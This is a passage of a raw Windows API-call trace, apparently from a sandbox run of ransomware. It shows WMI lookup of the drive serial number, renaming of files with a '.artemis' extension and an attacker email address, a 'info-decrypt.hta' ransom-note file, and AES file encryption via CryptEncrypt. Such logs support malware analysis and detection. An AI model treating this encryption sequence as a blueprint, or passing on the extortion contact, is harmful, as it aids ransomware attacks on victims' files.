[6]=0x0, [7]=0x46))) returned 0x0 [0153.312] WbemDefPath:IUnknown:Release (This=0x77bfa8) returned 0x3 [0153.312] CoGetContextToken (in: pToken=0x6cedc90 | out: pToken=0x6cedc90) returned 0x0 [0153.312] CoGetContextToken (in: pToken=0x6cee098 | out: pToken=0x6cee098) returned 0x0 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee128 | out: ppvObject=0x6cee128*=0x0) returned 0x80004002 [0153.313] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x2 [0153.313] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x1 [0153.313] CoGetContextToken (in: pToken=0x6ceea20 | out: pToken=0x6ceea20) returned 0x0 [0153.313] CoGetContextToken (in: pToken=0x6cee980 | out: pToken=0x6cee980) returned 0x0 [0153.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x6ceea50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceea4c | out: ppvObject=0x6ceea4c*=0x67389a0) returned 0x0 [0153.313] WbemDefPath:IUnknown:AddRef (This=0x67389a0) returned 0x3 [0153.313] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x2 [0153.313] WbemDefPath:IWbemPath:SetText (This=0x67389a0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0153.313] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x6ceebd0 | out: puCount=0x6ceebd0*=0x2) returned 0x0 [0153.313] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x6ceebcc*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebcc*=0xf, pszText=0x0) returned 0x0 [0153.313] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x6ceebcc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebcc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.313] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceebd0 | out: ppv=0x6ceebd0*=0x72015c) returned 0x0 [0153.313] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceebc8 | out: pAptType=0x6ceebc8*=1) returned 0x0 [0153.313] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceebcc | out: ppvObject=0x6ceebcc*=0x0) returned 0x80004002 [0153.313] IUnknown:Release (This=0x72015c) returned 0x1 [0153.314] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7f0 | out: ppv=0x6cee7f0*=0x673eee8) returned 0x0 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x673eee8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ceea08 | out: ppvObject=0x6ceea08*=0x0) returned 0x80004002 [0153.314] WbemLocator:IClassFactory:CreateInstance (in: This=0x673eee8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ceea1c | out: ppvObject=0x6ceea1c*=0x6736d98) returned 0x0 [0153.314] WbemLocator:IUnknown:Release (This=0x673eee8) returned 0x0 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee63c | out: ppvObject=0x6cee63c*=0x6736d98) returned 0x0 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5f8 | out: ppvObject=0x6cee5f8*=0x0) returned 0x80004002 [0153.314] WbemLocator:IUnknown:AddRef (This=0x6736d98) returned 0x3 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf54 | out: ppvObject=0x6cedf54*=0x0) returned 0x80004002 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedf10 | out: ppvObject=0x6cedf10*=0x0) returned 0x80004002 [0153.314] CoGetContextToken (in: pToken=0x6cedf70 | out: pToken=0x6cedf70) returned 0x0 [0153.314] CoGetContextToken (in: pToken=0x6cee378 | out: pToken=0x6cee378) returned 0x0 [0153.314] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee408 | out: ppvObject=0x6cee408*=0x0) returned 0x80004002 [0153.315] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x2 [0153.315] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x1 [0153.315] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0153.315] CoGetContextToken (in: pToken=0x6cee948 | out: pToken=0x6cee948) returned 0x0 [0153.315] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x6ceea18*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ceea14 | out: ppvObject=0x6ceea14*=0x6736d98) returned 0x0 [0153.315] WbemLocator:IUnknown:AddRef (This=0x6736d98) returned 0x3 [0153.315] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x2 [0153.315] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x6ceebac | out: puCount=0x6ceebac*=0x2) returned 0x0 [0153.315] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=8, puBuffLength=0x6ceeba8*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba8*=0xf, pszText=0x0) returned 0x0 [0153.315] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=8, puBuffLength=0x6ceeba8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.315] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea84 | out: ppv=0x6ceea84*=0x6737078) returned 0x0 [0153.315] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737078, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeb18 | out: ppNamespace=0x6ceeb18*=0x672eff4) returned 0x0 [0154.756] WbemLocator:IUnknown:QueryInterface (in: This=0x672eff4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9b4 | out: ppvObject=0x6cee9b4*=0x781ae4) returned 0x0 [0154.756] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ae4, pProxy=0x672eff4, pAuthnSvc=0x6ceea04, pAuthzSvc=0x6ceea00, pServerPrincName=0x6cee9f8, pAuthnLevel=0x6cee9fc, pImpLevel=0x6cee9ec, pAuthInfo=0x6cee9f0, pCapabilites=0x6cee9f4 | out: pAuthnSvc=0x6ceea04*=0xa, pAuthzSvc=0x6ceea00*=0x0, pServerPrincName=0x6cee9f8, pAuthnLevel=0x6cee9fc*=0x6, pImpLevel=0x6cee9ec*=0x2, pAuthInfo=0x6cee9f0, pCapabilites=0x6cee9f4*=0x1) returned 0x0 [0154.756] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x1 [0154.756] WbemLocator:IUnknown:QueryInterface (in: This=0x672eff4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9a8 | out: ppvObject=0x6cee9a8*=0x781b04) returned 0x0 [0154.756] WbemLocator:IUnknown:QueryInterface (in: This=0x672eff4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9a4 | out: ppvObject=0x6cee9a4*=0x781ae4) returned 0x0 [0154.756] WbemLocator:IClientSecurity:SetBlanket (This=0x781ae4, pProxy=0x672eff4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0154.757] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x2 [0154.757] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0154.757] CoTaskMemFree (pv=0x77e148) [0154.757] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x0 [0155.795] WbemLocator:IUnknown:QueryInterface (in: This=0x672eff4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5a4 | out: ppvObject=0x6cee5a4*=0x781b04) returned 0x0 [0155.795] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee560 | out: ppvObject=0x6cee560*=0x0) returned 0x80004002 [0155.950] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee37c | out: ppvObject=0x6cee37c*=0x0) returned 0x80004002 [0156.269] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0156.269] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedebc | out: ppvObject=0x6cedebc*=0x0) returned 0x80004002 [0156.512] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0156.512] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede78 | out: ppvObject=0x6cede78*=0x781a64) returned 0x0 [0156.513] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781a64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede80 | out: pCid=0x6cede80*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.513] WbemLocator:IUnknown:Release (This=0x781a64) returned 0x3 [0156.513] CoGetContextToken (in: pToken=0x6ceded8 | out: pToken=0x6ceded8) returned 0x0 [0156.513] CoGetContextToken (in: pToken=0x6cee2e0 | out: pToken=0x6cee2e0) returned 0x0 [0156.513] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee370 | out: ppvObject=0x6cee370*=0x781aec) returned 0x0 [0156.513] WbemLocator:IRpcOptions:Query (in: This=0x781aec, pPrx=0x781b04, dwProperty=2, pdwValue=0x6cee398 | out: pdwValue=0x6cee398) returned 0x80004002 [0156.513] WbemLocator:IUnknown:Release (This=0x781aec) returned 0x3 [0156.513] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0156.513] CoGetContextToken (in: pToken=0x6cee8b8 | out: pToken=0x6cee8b8) returned 0x0 [0156.513] CoGetContextToken (in: pToken=0x6cee818 | out: pToken=0x6cee818) returned 0x0 [0156.513] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x6cee8e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee8e4 | out: ppvObject=0x6cee8e4*=0x672eff4) returned 0x0 [0156.513] WbemLocator:IUnknown:AddRef (This=0x672eff4) returned 0x4 [0156.513] WbemLocator:IUnknown:Release (This=0x672eff4) returned 0x3 [0156.534] WbemLocator:IUnknown:Release (This=0x672eff4) returned 0x2 [0156.535] SysStringLen (param_1=0x0) returned 0x0 [0156.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x6ceec7c | out: puCount=0x6ceec7c*=0x0) returned 0x0 [0156.535] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec78*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec78*=0x20, pszText=0x0) returned 0x0 [0156.535] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.535] CoGetContextToken (in: pToken=0x6cee8e8 | out: pToken=0x6cee8e8) returned 0x0 [0156.535] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0156.535] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee77c | out: ppvObject=0x6cee77c*=0x781b04) returned 0x0 [0156.535] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x3 [0156.535] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0156.535] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec80*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec80*=0x20, pszText=0x0) returned 0x0 [0156.535] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec80*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec80*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.535] IWbemServices:GetObject (in: This=0x672eff4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceec34*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceec34*=0x673b138, ppCallResult=0x0) returned 0x0 [0158.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x6ceec34 | out: puCount=0x6ceec34*=0x2) returned 0x0 [0158.620] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0xf, pszText=0x0) returned 0x0 [0158.620] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x6ceec30*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceec30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.620] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34a1084*=0, plFlavor=0x34a1088*=0 | out: pVal=0x6ceec30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34a1084*=8, plFlavor=0x34a1088*=0) returned 0x0 [0158.620] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.620] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.620] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34a1084*=8, plFlavor=0x34a1088*=0 | out: pVal=0x6ceec38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34a1084*=8, plFlavor=0x34a1088*=0) returned 0x0 [0158.620] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.620] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.621] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee838, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0158.621] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee838, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x52 [0158.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec98) returned 1 [0158.621] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe"), fInfoLevelId=0x0, lpFileInformation=0x6ceed14 | out: lpFileInformation=0x6ceed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ffba80, ftCreationTime.dwHighDateTime=0x1d5765c, ftLastAccessTime.dwLowDateTime=0xc770d040, ftLastAccessTime.dwHighDateTime=0x1d5889d, ftLastWriteTime.dwLowDateTime=0xc770d040, ftLastWriteTime.dwHighDateTime=0x1d5889d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0158.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec94) returned 1 [0158.621] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0158.625] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0158.625] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0158.625] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", lpFilePart=0x0) returned 0x2d [0158.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed3c) returned 1 [0158.626] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceedb8 | out: lpFileInformation=0x6ceedb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a5460, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x66a5460, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x66a5460, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0158.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed38) returned 1 [0158.626] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee858, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0158.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed04) returned 1 [0158.626] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe" (normalized: "c:\\program files (x86)\\adobe\\far.exe"), fInfoLevelId=0x0, lpFileInformation=0x34a1748 | out: lpFileInformation=0x34a1748*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c72a30, ftCreationTime.dwHighDateTime=0x1d57e7b, ftLastAccessTime.dwLowDateTime=0x7d642d50, ftLastAccessTime.dwHighDateTime=0x1d5c9d2, ftLastWriteTime.dwLowDateTime=0x7d642d50, ftLastWriteTime.dwHighDateTime=0x1d5c9d2, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0158.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed00) returned 1 [0158.626] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee744, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0158.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec38) returned 1 [0158.626] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe" (normalized: "c:\\program files (x86)\\adobe\\far.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x578 [0158.626] GetFileType (hFile=0x578) returned 0x1 [0158.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec34) returned 1 [0158.627] GetFileType (hFile=0x578) returned 0x1 [0158.627] GetFileSize (in: hFile=0x578, lpFileSizeHigh=0x6ceed40 | out: lpFileSizeHigh=0x6ceed40*=0x0) returned 0x13a00 [0158.627] ReadFile (in: hFile=0x578, lpBuffer=0x34a18c0, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x6ceecec, lpOverlapped=0x0 | out: lpBuffer=0x34a18c0*, lpNumberOfBytesRead=0x6ceecec*=0x13a00, lpOverlapped=0x0) returned 1 [0158.628] CloseHandle (hObject=0x578) returned 1 [0158.629] CryptAcquireContextW (in: phProv=0x6ceec8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec8c*=0x6eec90) returned 1 [0158.630] CryptGenRandom (in: hProv=0x6eec90, dwLen=0x10, pbBuffer=0x34b5984 | out: pbBuffer=0x34b5984) returned 1 [0166.429] CryptImportKey (in: hProv=0x6eec90, pbData=0x34f6368, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec5c | out: phKey=0x6ceec5c*=0x77b3f0) returned 1 [0166.582] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.582] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.582] CryptDuplicateKey (in: hKey=0x77b3f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceec4c | out: phKey=0x6ceec4c*=0x77b3b0) returned 1 [0166.582] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.582] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x4, pbData=0x34f6448*=0x1, dwFlags=0x0) returned 1 [0166.582] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x1, pbData=0x34f6414, dwFlags=0x0) returned 1 [0166.582] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35e49f8*, pdwDataLen=0x6ceecb8*=0x13a10, dwBufLen=0x13a10 | out: pbData=0x35e49f8*, pdwDataLen=0x6ceecb8*=0x13a10) returned 1 [0166.583] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f842c*, pdwDataLen=0x6ceecc0*=0x0, dwBufLen=0x10 | out: pbData=0x35f842c*, pdwDataLen=0x6ceecc0*=0x10) returned 1 [0166.586] CryptDestroyKey (hKey=0x77b3f0) returned 1 [0166.586] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0166.586] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0166.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee730, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files 